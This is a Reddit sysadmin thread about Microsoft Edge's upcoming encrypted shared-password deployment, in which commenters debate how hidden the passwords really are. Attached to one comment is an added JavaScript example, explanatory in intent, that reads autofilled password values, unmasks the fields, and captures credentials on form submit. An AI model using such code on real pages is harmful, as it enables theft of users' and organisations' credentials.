Enterprise Password Vaulting coming to the Microsoft Edge Web Browser
Posted by DOMZE24@reddit | sysadmin | 15 comments
Just saw this in my news feed.
There’s a known security gap that you may have been tolerating out of necessity—a common password shared across a set of users. Whether it’s a team accessing the same data repository or managing common social media accounts, passwords are often passed around in emails, chats, and even on paper. This risky practice can lead to unapproved users gaining access and serious downstream consequences.
Secure password deployment in the Edge management service can help put an end to this. It enables you to deploy encrypted shared passwords to a set of users, allowing them to log into websites seamlessly without ever seeing the actual passwords, reducing the risk of unauthorized access and enhancing your organization’s overall security posture.
Secure password deployment will be available in preview in the coming months for Microsoft 365 Business Premium, E3, and E5 subscriptions.
https://blogs.windows.com/msedgedev/2024/11/19/microsoft-edge-for-business-transform-your-workday-ignite-2024/#shared-passwords
Myriade-de-Couilles@reddit
Dev tools can be disabled by policy too, I’m sure the documentation for this feature will mention this
tankerkiller125real@reddit
Yeah, no thanks, we'll stick to our proper enterprise password management tool that leaves zero trace data on the machine and has solid administrative controls. With the browser password management disabled.
How insecure is browser-based password management? Well, given that the actual password manager we use at work can simply rip the passwords from them with zero passwords, PINs, etc. required, I'd say very, very insecure.
StarDestroyer78@reddit
KeePass on a secured shared drive for IT only along with a .key file and a shared secret (stored in a personal KeePass file) seems to be sufficient for me. When paired with the Kee plugin for Chrome and the AutoOpen plugin for KeePass I only have to enter my personal secret once per day and I have "saved passwords" available in my browser.
Elmofuntz@reddit
It'll be interesting to see how this works and prevents users from fooling the system and exposing the password. Of course, it would just be nice if the Edge browser had a decent password vault for normal use that was harder to extract passwords from and that the enterprise had more control over.
piense@reddit
F12 sees all
PlannedObsolescence_@reddit
Disabling the developer console (already possible via browser policy) will probably be a pre-req for this feature.
Otherwise, if you can get it to not submit the page after entering credentials, you could change the password field from `type="password"` to `type="text"` and get it in plaintext.
DenialP@reddit
I spoke with the Edge for Business team at the Ignite booth earlier. They are trying hard to integrate simple solutions to add value to enterprise licensing we already have or have available. The simple truth is users need a managed space for secure passwords and if we aren't providing it, then the shadow-it department is providing it (along with all of those security risks we don't like hearing about). While this doesn't add any PAM-like capacity to Edge for modern administration (I asked, worth a shot), they did add a crapload of plugin management to edge to make management easier for endusers to request (yo, dingus, this would be a signal flare that users are interested in an app, and a successful team would provide said resource if vetted or steer user in the correct, approved, and documented process... but what do I know?). Nice features and a cool team. (i'm not a microsoft employee, they'd never have me)
the edge for business team is kicking ass
we're all going to have to learn purview
hope this is somewhat insightful
quantumhardline@reddit
This shares passwords with multiple users, and for many reasons, each user should have unique login.
ReputationNo8889@reddit
But you also have tools without multi user management where password sharing is required. This closes that gap.
NobleRuin6@reddit
No kidding. That isn’t what enterprise password vaulting is for. There will always be some systems that have shared accounts that a team uses. Not that I would personally store my host roots in Edge…but I could see a use case for some credentials like service accounts.
quantumhardline@reddit
The link posted talks about sharing passwords with other employees etc., which is why I commented about the password-sharing piece .. 🤦♂️
gandraw@reddit
ITT we reinvent certificate authentication.
gihutgishuiruv@reddit
> allowing them to log into websites seamlessly without ever seeing the actual passwords
I suspect "seeing" is doing some heavy lifting here. Obviously the password would still need to be decrypted on the client, and you could likely see it in the clear with e.g. browser dev tools. It seems like it would give non-technical managers a false sense of security about the "hidden-ness" of such passwords.
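The point made in this comment and in the earlier "F12 sees all" / `type="password"` replies, as an added example that is not part of the thread and not Microsoft's code: once the browser has autofilled a field, any script running in the page can read the plaintext, whether from the DevTools console, a bookmarklet, an extension content script, or the site's own JavaScript. Flipping the field to `type="text"` is only the visible version of the trick; `.value` already holds the secret, and a `submit` listener can capture it and stop the navigation. The functions below run unchanged in a browser console (pass `document` and `document.forms[0]`); the fake document, form, field names and the value `hunter2-autofilled` are constructed stand-ins so the file also runs outside a browser.

```javascript
// Added example (not from the thread or from Microsoft): what page-level
// script can do with a password the browser has autofilled.
// In a browser console: demo(document, document.forms[0]).

// Read every password field's current value without touching the UI.
// No type change is needed: `.value` is already the plaintext.
function readPasswordFields(doc) {
  const out = [];
  for (const el of doc.querySelectorAll('input[type="password"]')) {
    out.push({ name: el.name || el.id || '(unnamed)', value: el.value });
  }
  return out;
}

// The trick from the thread: flip type="password" to type="text" so the
// plaintext shows on screen. Returns how many fields were flipped.
function unmaskPasswordFields(doc) {
  let n = 0;
  for (const el of doc.querySelectorAll('input[type="password"]')) {
    el.type = 'text';
    n += 1;
  }
  return n;
}

// Capture credentials at submit time, before the page navigates away.
// `sink` receives {name: value} for every named control in the form;
// with block=true the submit is cancelled so the page never leaves.
function interceptSubmit(form, sink, { block = true } = {}) {
  form.addEventListener('submit', (ev) => {
    const captured = {};
    for (const el of form.elements) {
      if (el.name) captured[el.name] = el.value;
    }
    sink(captured);
    if (block) ev.preventDefault();
  });
}

// Constructed stand-in for the small DOM surface used above, so the file can
// run under Node. The field names and values are made up for the example.
function makeFakeDocument() {
  const elements = [
    { tagName: 'INPUT', type: 'text', name: 'user', value: 'shared-team-account' },
    { tagName: 'INPUT', type: 'password', name: 'pass', value: 'hunter2-autofilled' },
  ];
  const listeners = {};
  const form = {
    elements,
    addEventListener(type, fn) {
      if (!listeners[type]) listeners[type] = [];
      listeners[type].push(fn);
    },
    // Simulates the user clicking the login button. Returns true when the
    // page would actually have navigated (no listener cancelled it).
    submit() {
      const ev = { defaultPrevented: false, preventDefault() { this.defaultPrevented = true; } };
      for (const fn of listeners.submit || []) fn(ev);
      return !ev.defaultPrevented;
    },
  };
  const doc = {
    querySelectorAll(selector) {
      // Only the one selector used in this file is supported by the stand-in.
      if (selector !== 'input[type="password"]') throw new Error('unsupported selector');
      return elements.filter((e) => e.type === 'password');
    },
  };
  return { doc, form };
}

// Run the three techniques in order and return what the script observed.
function demo(doc, form) {
  const beforeSubmit = readPasswordFields(doc);   // plaintext via .value
  const captured = [];
  interceptSubmit(form, (c) => captured.push(c)); // grab it at submit
  const navigated = form.submit();                // false: submit was blocked
  const flipped = unmaskPasswordFields(doc);      // now visible on screen too
  return { beforeSubmit, captured, navigated, flipped };
}

if (typeof document === 'undefined') {
  const { doc, form } = makeFakeDocument();
  console.log(JSON.stringify(demo(doc, form), null, 2));
}
```

Disabling DevTools by policy removes the console, but it does not change what the page's own script, or an extension with a content script on that origin, can read: the credential has to be decrypted and placed into the field for autofill to work at all, so "never seeing the password" is a statement about the UI, not about the data.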
gregarious119@reddit
Going to be interesting to watch this get weighed in the balance of obvious security improvement vs. too many eggs in one security basket.
_BoNgRiPPeR_420@reddit
Pen testers are going to have a field day with this.